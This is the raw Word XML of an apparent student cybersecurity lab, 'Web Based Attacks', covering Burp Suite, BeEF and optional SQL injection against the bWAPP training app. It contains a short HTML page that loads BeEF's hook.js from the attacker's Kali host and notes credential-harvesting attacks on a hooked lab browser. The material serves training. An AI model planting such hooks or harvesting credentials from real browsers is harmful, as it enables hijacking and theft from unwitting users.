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7B009" w14:textId="6360A5C9" w:rsidR="00F935F2" w:rsidRPr="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F935F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Lab 9 - Web Based Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72392FFE" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRPr="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F935F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F324AD" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Become familiar with web application scanning techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2CF00" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Become familiar with web application spidering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5BF7C9" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Become familiar with Cross Site Scripting attacks using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553DAA1E" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Become familiar with SQL injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B42168" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRPr="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F935F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1678E48A" w14:textId="2CAC0B5B" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:r>
        <w:t xml:space="preserve">For this lab, you'll need your Kali, Windows 7, and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BWapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Container running in Kali and access to the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E44B57" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F935F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Using Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B0DD6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>Within Kali, select “Applications" - "Web Applications Analysis" – “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BEC4A6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>After opening Burp Suite, accept the terms and conditions and select "Temporary project" and then select "Start Burp". If you receive a message about Java, simply click "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>okay</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8B0286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 xml:space="preserve">Within Burp, select the Proxy tab to confirm "Intercept is off" and then click "Open Browser" to launch a Burp Browser to interact with website </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>destintations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ECAFEF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>Within Burp, select the Target tab to bring it to focus to monitor the "targets" that are found while browsing websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44265B56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 xml:space="preserve">Within your Burp browser, go to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>http://www.umbc.edu</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0E8AC138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>Within Burp, take note of the entries that show on the target tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E625D50" w14:textId="4AE819B4" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="452EDEB7" wp14:editId="698029B2">
            <wp:extent cx="5943600" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141668300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83004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27CA" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C23460D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lastRenderedPageBreak/>
        <w:t>Within your Burp browser, go to http://www.bom.gov.au/ and perform a couple searches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70435037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>Within the target tab of Burp, highlight the entries related to the searches you performed and take note of the request and response tabs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700B2BC1" w14:textId="25274966" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F379815" wp14:editId="2E7156DF">
            <wp:extent cx="5943600" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="116633203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32035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329C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 xml:space="preserve">Refer to the About page for information on starting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BWapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC7626A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>Once the container is started, navigate to the IP and port for the container in the Burp browser, which should be your Kali IP (or localhost) and port 8090.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B174AE2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 xml:space="preserve">You should see a database error. To resolve, navigate to http://localhost:8090/install.php and click the link to install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BWapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A099CA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 xml:space="preserve">Now re-access the main page. If it successfully loads, go back into </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Burp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and verify that it is now listed as a target. Continue to browse through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BWapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application and take note of the pages logged within Burp, especially any of the injection related pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A4FC0D" w14:textId="6AB1017C" w:rsidR="0029663C" w:rsidRDefault="0029663C" w:rsidP="0029663C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2392DE2C" wp14:editId="29E1B4A7">
            <wp:extent cx="5943600" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19299449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44973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C47B" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>At the completion of this section using Burp, you can close the Burp Browser or minimize it to go on to the Beef Section below using the regular browser within Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D68450" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F935F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F935F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B9EE4E7" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within Kali, open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> by clicking on “Applications” – “Exploitation Tools” – “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> XSS </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Framework</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C044B8" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has loaded, access it within Kali by going to http://127.0.0.1:3000/ui/panel with the default credentials of username "beef" and password "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>beefbeef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3018EF4E" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Create an HTML file in the /var/www/html directory that references the hook.js file that you can access from another computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFE2166" w14:textId="0E033DE4" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:r>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653FE67" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:r>
        <w:t xml:space="preserve">    &lt;html&gt;&lt;head&gt;&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F537FAD" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:r>
        <w:t xml:space="preserve">&lt;body&gt;&lt;script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="http://[KALI-IP</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>]:3000/hook.js</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>" type=text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155C38C" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:r>
        <w:t>&lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381F6DB7" w14:textId="2D6A0043" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Save file as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>beef.html</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23B6D6A2" w14:textId="34290DFC" w:rsidR="0016423F" w:rsidRDefault="0016423F" w:rsidP="0016423F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0016423F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="260A5BA2" wp14:editId="6D646E38">
            <wp:extent cx="5943600" cy="3698875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="617245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4528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D4D5" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In another virtual machine (such as Windows 7), access the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> website by going to http://[Kali-IP]/beef.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B1B092" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once you’ve “hooked” your host machine, it will appear under the “Online Browsers” menu within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> admin panel. Highlight your browser and begin sending attacks to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396DC301" w14:textId="67501768" w:rsidR="0016423F" w:rsidRDefault="0016423F" w:rsidP="0016423F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0016423F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="069ED257" wp14:editId="21945A84">
            <wp:extent cx="5943600" cy="3704590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="301146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4639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E908" w14:textId="5289EE24" w:rsidR="00C501E9" w:rsidRDefault="00C501E9" w:rsidP="0016423F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1081BCB7" wp14:editId="2310025A">
            <wp:extent cx="5943600" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="908535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354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C0AA" w14:textId="19739FAC" w:rsidR="00C501E9" w:rsidRDefault="00C501E9" w:rsidP="0016423F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03C13FBD" wp14:editId="66FBFB51">
            <wp:extent cx="5943600" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1360488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882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29FF" w14:textId="2149E563" w:rsidR="00C501E9" w:rsidRDefault="00C501E9" w:rsidP="0016423F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AF1C3F5" wp14:editId="3294FD05">
            <wp:extent cx="5943600" cy="3714750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="443712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124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72C0" w14:textId="50348F6E" w:rsidR="00C501E9" w:rsidRDefault="00C501E9" w:rsidP="0016423F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>We can see a lot of attacks through Beef framework. We performed social engineering attacks to harvest credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF8591" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:r>
        <w:t>3. SQL Injection (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43CBD0" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Try to manually perform SQL injection against the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BWapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Container web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EED6FC" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Refer to the About page for information on starting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BWapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> container, if it is not currently </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>running</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3FBA5518" w14:textId="77777777" w:rsidR="00F935F2" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BWapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application using bee/bug as the credentials. Then select the page you want to hack. You may want to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>refer back</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to the Burp results from above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C1F10E" w14:textId="6A5F417F" w:rsidR="00470E5D" w:rsidRDefault="00F935F2" w:rsidP="00F935F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Have fun!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09469D1C" w14:textId="37DB4A2B" w:rsidR="006203EB" w:rsidRDefault="006203EB" w:rsidP="006203EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72B92CEF" wp14:editId="4A467B75">
            <wp:extent cx="5219700" cy="2615804"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2104044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04452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110" cy="263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03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06578"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC54D7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581F7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AE6E57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A55C42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43AA67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CD20A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74BCC7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256DBA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D385C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1736259">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="953757489">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1091313783">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1629584870">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="16843613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5F2"/>
    <w:rsid w:val="0016423F"/>
    <w:rsid w:val="0029663C"/>
    <w:rsid w:val="00470E5D"/>
    <w:rsid w:val="006203EB"/>
    <w:rsid w:val="00AD78BF"/>
    <w:rsid w:val="00C501E9"/>
    <w:rsid w:val="00F93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4D538"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{60AC8520-B709-4AE5-AE1B-D03402D59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35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1485</TotalTime>
  <Pages>6</Pages>
  <Words>509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Sairam Bokka</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sairam Bokka</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-21T15:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-22T16:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>